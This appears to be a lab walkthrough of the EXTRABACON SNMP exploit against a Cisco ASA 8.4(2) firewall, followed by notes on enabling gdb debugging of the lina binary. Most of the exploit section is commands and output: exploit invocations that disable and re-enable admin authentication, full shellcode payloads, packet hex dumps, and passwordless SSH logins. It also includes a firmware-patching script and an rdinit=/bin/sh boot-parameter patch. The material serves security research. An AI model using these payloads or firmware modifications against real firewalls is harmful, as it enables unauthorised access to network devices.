# Extrabacon (EXBA) exploit


Normal ssh connection

# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: cisco
asa> enable
Password: cisco
asa# exit

Checking exploit support

# python extrabacon_1.1.0.1.py info -t asa:161 -c cisco
[+] Executing:  extrabacon_1.1.0.1.py info -t asa:161 -c cisco
[+] probing target via snmp
[+] Connecting to asa:161
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[0L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.3.0']>
   |   |  value     = <ASN1_TIME_TICKS[363400L]>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.5.0']>
   |   |  value     = <ASN1_STRING['asa.lab.net']>

[+] firewall uptime is 363400 time ticks, or 1:00:34

[+] firewall name is asa.lab.net

[+] target is running asa842, which is supported
Data stored in key file  : asa842
Data stored in self.vinfo: ASA842

Launching the exploit (disabling passwords)

# python extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-disable
[+] Executing:  extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-disable
Data stored in self.vinfo: ASA842
[+] generating exploit for exec mode pass-disable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa842
[+] building payload for mode pass-disable
appended PMCHECK_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3
appended AAAADMINAUTH_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3
[+] random SNMP request-id 80055950
[+] fixing offset to payload 49
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.49.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144
payload (133): bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c3
EXBA msg (369): 3082016d0201010405636973636fa582015f020404c58e8e0201000201013082014f30819106072b060102010101048185bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c33081b80681b32b060104010909836b010303010105095f8138437b7a812d3581258125812581258103816c048109042481098165810381454831814031815b813310318176813f812e812a812a812a81018177812581258125812560810b81042481600100000431817f8150618143811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811019471409810b7c2414810b07817f816081100500
[+] Connecting to asa:161
[+] packet 1 of 1
[+] 0000   30 82 01 6D 02 01 01 04  05 63 69 73 63 6F A5 82   0..m.....cisco..
[+] 0010   01 5F 02 04 04 C5 8E 8E  02 01 00 02 01 01 30 82   ._............0.
[+] 0020   01 4F 30 81 91 06 07 2B  06 01 02 01 01 01 04 81   .O0....+........
[+] 0030   85 BF A5 A5 A5 A5 B8 D8  A5 A5 A5 31 F8 BB A5 25   ...........1...%
[+] 0040   F6 AC 31 FB B9 A5 B5 A5  A5 31 F9 BA A2 A5 A5 A5   ..1......1......
[+] 0050   31 FA CD 80 EB 14 BF F0  8F 53 09 31 C9 B1 04 FC   1........S.1....
[+] 0060   F3 A4 E9 0C 00 00 00 5E  EB EC E8 F8 FF FF FF 31   .......^.......1
[+] 0070   C0 40 C3 BF A5 A5 A5 A5  B8 D8 A5 A5 A5 31 F8 BB   .@...........1..
[+] 0080   A5 B5 AD AD 31 FB B9 A5  B5 A5 A5 31 F9 BA A2 A5   ....1......1....
[+] 0090   A5 A5 31 FA CD 80 EB 14  BF E0 13 08 08 31 C9 B1   ..1..........1..
[+] 00a0   04 FC F3 A4 E9 0C 00 00  00 5E EB EC E8 F8 FF FF   .........^......
[+] 00b0   FF 31 C0 40 C3 C3 30 81  B8 06 81 B3 2B 06 01 04   .1.@..0.....+...
[+] 00c0   01 09 09 83 6B 01 03 03  01 01 05 09 5F 81 38 43   ....k......._.8C
[+] 00d0   7B 7A 81 2D 35 81 25 81  25 81 25 81 25 81 03 81   {z.-5.%.%.%.%...
[+] 00e0   6C 04 81 09 04 24 81 09  81 65 81 03 81 45 48 31   l....$...e...EH1
[+] 00f0   81 40 31 81 5B 81 33 10  31 81 76 81 3F 81 2E 81   .@1.[.3.1.v.?...
[+] 0100   2A 81 2A 81 2A 81 01 81  77 81 25 81 25 81 25 81   *.*.*...w.%.%.%.
[+] 0110   25 60 81 0B 81 04 24 81  60 01 00 00 04 31 81 7F   %`....$.`....1..
[+] 0120   81 50 61 81 43 81 10 81  10 81 10 81 10 81 10 81   .Pa.C...........
[+] 0130   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0140   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0150   10 81 10 81 10 81 10 81  10 81 10 81 10 19 47 14   ..............G.
[+] 0160   09 81 0B 7C 24 14 81 0B  07 81 7F 81 60 81 10 05   ...|$.......`...
[+] 0170   00                                                 .
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[80055950L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.99.105.115.99.111.46.49.57.50.46.49.54.56.46.49.46.51.51.46.50']>
   |   |  value     = <ASN1_STRING['']>
[+] received SNMP id 80055950, matches random id sent, likely success
[+] clean return detected

Ssh connection with password disabled

# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: <enter>
asa> enable
Password: <enter>
asa# exit

Launching the exploit (re-enabling passwords)

# python extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-enable
[+] Executing:  extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-enable
Data stored in self.vinfo: ASA842
[+] generating exploit for exec mode pass-enable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa842
[+] building payload for mode pass-enable
appended PMCHECK_ENABLE payload eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80
appended AAAADMINAUTH_ENABLE payload eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80
[+] random SNMP request-id 425184577
[+] fixing offset to payload 49
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.49.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144
payload (133): eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80c3
EXBA msg (369): 3082016d0201010405636973636fa582015f02041957cd410201000201013082014f30819106072b060102010101048185eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80c33081b80681b32b060104010909836b010303010105095f8138437b7a812d3581258125812581258103816c048109042481098165810381454831814031815b813310318176813f812e812a812a812a81018177812581258125812560810b81042481600100000431817f8150618143811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811019471409810b7c2414810b07817f816081100500
[+] Connecting to asa:161
[+] packet 1 of 1
[+] 0000   30 82 01 6D 02 01 01 04  05 63 69 73 63 6F A5 82   0..m.....cisco..
[+] 0010   01 5F 02 04 19 57 CD 41  02 01 00 02 01 01 30 82   ._...W.A......0.
[+] 0020   01 4F 30 81 91 06 07 2B  06 01 02 01 01 01 04 81   .O0....+........
[+] 0030   85 EB 14 BF F0 8F 53 09  31 C9 B1 04 FC F3 A4 E9   ......S.1.......
[+] 0040   2F 00 00 00 5E EB EC E8  F8 FF FF FF 55 31 C0 89   /...^.......U1..
[+] 0050   BF A5 A5 A5 A5 B8 D8 A5  A5 A5 31 F8 BB A5 25 F6   ..........1...%.
[+] 0060   AC 31 FB B9 A5 B5 A5 A5  31 F9 BA A0 A5 A5 A5 31   .1......1......1
[+] 0070   FA CD 80 EB 14 BF E0 13  08 08 31 C9 B1 04 FC F3   ..........1.....
[+] 0080   A4 E9 2F 00 00 00 5E EB  EC E8 F8 FF FF FF 55 89   ../...^.......U.
[+] 0090   E5 57 BF A5 A5 A5 A5 B8  D8 A5 A5 A5 31 F8 BB A5   .W..........1...
[+] 00a0   B5 AD AD 31 FB B9 A5 B5  A5 A5 31 F9 BA A0 A5 A5   ...1......1.....
[+] 00b0   A5 31 FA CD 80 C3 30 81  B8 06 81 B3 2B 06 01 04   .1....0.....+...
[+] 00c0   01 09 09 83 6B 01 03 03  01 01 05 09 5F 81 38 43   ....k......._.8C
[+] 00d0   7B 7A 81 2D 35 81 25 81  25 81 25 81 25 81 03 81   {z.-5.%.%.%.%...
[+] 00e0   6C 04 81 09 04 24 81 09  81 65 81 03 81 45 48 31   l....$...e...EH1
[+] 00f0   81 40 31 81 5B 81 33 10  31 81 76 81 3F 81 2E 81   .@1.[.3.1.v.?...
[+] 0100   2A 81 2A 81 2A 81 01 81  77 81 25 81 25 81 25 81   *.*.*...w.%.%.%.
[+] 0110   25 60 81 0B 81 04 24 81  60 01 00 00 04 31 81 7F   %`....$.`....1..
[+] 0120   81 50 61 81 43 81 10 81  10 81 10 81 10 81 10 81   .Pa.C...........
[+] 0130   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0140   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0150   10 81 10 81 10 81 10 81  10 81 10 81 10 19 47 14   ..............G.
[+] 0160   09 81 0B 7C 24 14 81 0B  07 81 7F 81 60 81 10 05   ...|$.......`...
[+] 0170   00                                                 .
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[425184577L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.99.105.115.99.111.46.49.57.50.46.49.54.56.46.49.46.51.51.46.50']>
   |   |  value     = <ASN1_STRING['']>
[+] received SNMP id 425184577, matches random id sent, likely success
[+] clean return detected

Normal ssh connection

# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: <enter>
Permission denied, please try again.
admin@asa's password:

References

https://blog.silentsignal.eu/2016/08/25/bake-your-own-extrabacon/

# Enabling lina debug mode


Preparing .gdbinit

# r2 lina
[0x0804d520]> aar
[0x0804d520]> s sym.imp.setitimer
[0x0804cf94]> vp
  |||||||   ;-- imp.setitimer:
  |||||||   ; CALL XREF from 0x08c8ff2b (unk)
  |||||||   ; CALL XREF from 0x08c8ffc8 (unk)
  |||||||   ; CALL XREF from 0x08c900d8 (unk)
  |||||||   ; CALL XREF from 0x08c9011e (unk)
  |||||||   0x0804cf94      ff253c93bc09   jmp dword [reloc.setitimer_60] ; reloc.setitimer
  |||||||   0x0804cf9a      6878060000     push 0x678
  ========< 0x0804cf9f      e9f0f2ffff     jmp 0x804c294               ;[1]
:> s 0x08c900d8
            0x08c900d8      e8b7ce3bff     call sym.imp.setitimer      ;[1]
            0x08c900dd      c9             leave
            0x08c900de      c3             ret
            0x08c900df      90             nop
            ; CALL XREF from 0x0805e9ba (unk)
            ; CALL XREF from 0x08c91ed9 (unk)
            0x08c900e0      55             push ebp
            0x08c900e1      89e5           mov ebp, esp
            0x08c900e3      83ec28         sub esp, 0x28               ; '('
            0x08c900e6      8b0da46ad109   mov ecx, dword [0x9d16aa4]  ; [0x9d16aa4:4]=0x4c
            0x08c900ec      81f93f420f00   cmp ecx, 0xf423f
        ,=< 0x08c900f2      7f34           jg 0x8c90128


# cat .gdbinit
set debug remote 1
set disassembly-flavor intel
target remote /dev/ttyUSB0
# Patch the watchdog
set *0x9d16aa4=0
file ~/lina

Option 1: Modifying the rootfs

# cat enable_gdb.sh
#!/bin/bash

binary="$1"
rfs='rootfs.img'
rfsgz="$rfs.gz"
d='extracted'
rcs='asa/scripts/rcS'

cp $binary $binary.orig

echo "[+] cp $binary $binary.orig"

offset=`binwalk -y='gzip' $binary | grep rootfs | awk '{print $1}'`
end=`binwalk --raw='\x0b\x01\x64\x00\x00' $binary | grep 00 | tail -n 1 | awk '{print $1}'`

size=`expr $end - $offset`

echo "[+] $binary"
echo "[+] \__ $rfsgz - $size bytes"

dd if=$binary of=$rfsgz skip=$offset count=$size bs=1

echo "[+] $binary >> $rfsgz"

mkdir $d
cd $d
gunzip -c ../$rfsgz | cpio -i --no-absolute-filenames --make-directories
gzip -f -d ../$rfsgz
mv ../$rfs .
echo "[+] $rfsgz ~ $rfs"

sed -i 's/#\(.*ttyUSB0.*\)/\1/' $rcs
sed -i 's/ttyUSB0/ttyS0/' $rcs

echo "[+] gdb enabled in $rcs"

echo "$rcs" | cpio --format='newc' -o --append -F $rfs

echo "[+] $rfs updated"

gzip -f -9 $rfs
mv $rfsgz ../.

echo "[+] $rfs ~ $rfsgz"

cd ..
rm -rf $d

nsize=`stat -c%s $rfsgz`
sizediff=`expr $size - $nsize`

dd if=/dev/zero count=$sizediff bs=1 conv=notrunc,noerror status=noxfer >> $rfsgz
nsize=`stat -c%s $rfsgz`
dd if=$rfsgz of=$binary seek=$offset count=$nsize bs=1 conv=notrunc,noerror

echo "[+] $rfsgz >> $binary"

rm $rfsgz

echo "[+] Done!"

# ./enable_gdb.sh asa842-k8.bin
[+] cp asa842-k8.bin asa842-k8.bin.orig
[+] asa842-k8.bin
[+] \__ rootfs.img.gz = 23628432 bytes
[+] asa842-k8.bin >> rootfs.img.gz
[+] rootfs.img.gz ~ rootfs.img
[+] gdb enabled in asa/scripts/rcS
[+] rootfs.img updated
[+] rootfs.img ~ rootfs.img.gz
[+] rootfs.img.gz >> asa842-k8.bin
[+] Done!# Checksum bypass
# scp -oKexAlgorithms=+diffie-hellman-group1-sha1 asa842-k8.bin admin@asa:asa842-k8-gdb.bin
# gdb
asa(config)# boot system disk0:/asa842-k8-gdb.bin
asa(config)# wr
asa(config)# reload

...
SMFW PID: 479, SMFW started in mode 0
SMFW PID: 481, Starting /asa/bin/lina under gdbserver /dev/ttyS0
SMFW PID: 479, started gdbserver on member: 481//asa/bin/lina
SMFW PID: 479, created member ASA BLOB, PID=481
Process /asa/bin/lina created; pid = 484
Remote debugging using /dev/ttyS0

Option 2: Modifying kernel boot parameters

# r2 -w asa842-k8.bin
[0x00000000]> / quiet
[0x00000000]> s hit0_1
[0x017ed8dc]> px
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x017ed8dc  7175 6965 7420 6c6f 676c 6576 656c 3d30  quiet loglevel=0
0x017ed8ec  2061 7574 6f20 6b73 7461 636b 3d31 3238   auto kstack=128
[0x017ed8dc]> w rdinit=/bin/sh        k
[0x017ed8dc]> px
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x017ed8dc  7264 696e 6974 3d2f 6269 6e2f 7368 2020  rdinit=/bin/sh
0x017ed8ec  2020 2020 2020 6b73 7461 636b 3d31 3238        kstack=128# Checksum bypass
# scp -oKexAlgorithms=+diffie-hellman-group1-sha1 asa842-k8.bin admin@asa:asa842-k8-binsh.bin
# gdb
asa(config)# boot system disk0:/asa842-k8-binsh.bin
asa(config)# wr
asa(config)# reload

...
Freeing unused kernel memory: 156k freed
Write protecting the kernel text: 1716k
Write protecting the kernel read-only data: 504k
/bin/sh: can't access tty; job control turned off
# sed -i 's/#\(.*\)ttyUSB0\(.*\)/\1ttyS0\2/' /asa/scripts/rcS
# exec /sbin/init

...
SMFW PID: 479, SMFW started in mode 0
SMFW PID: 481, Starting /asa/bin/lina under gdbserver /dev/ttyS0
SMFW PID: 479, started gdbserver on member: 481//asa/bin/lina
SMFW PID: 479, created member ASA BLOB, PID=481
Process /asa/bin/lina created; pid = 484
Remote debugging using /dev/ttyS0

References

http://www.slideshare.net/CanSecWest/csw2016-wheeler-barksdalegruskovnjakexecutemypacket
http://2014.ruxcon.org.au/assets/2014/slides/Breaking%20Bricks%20Ruxcon%202014.pdf
https://community.rapid7.com/community/metasploit/blog/2016/06/14/asa-hack
https://blog.silentsignal.eu/2016/08/25/bake-your-own-extrabacon/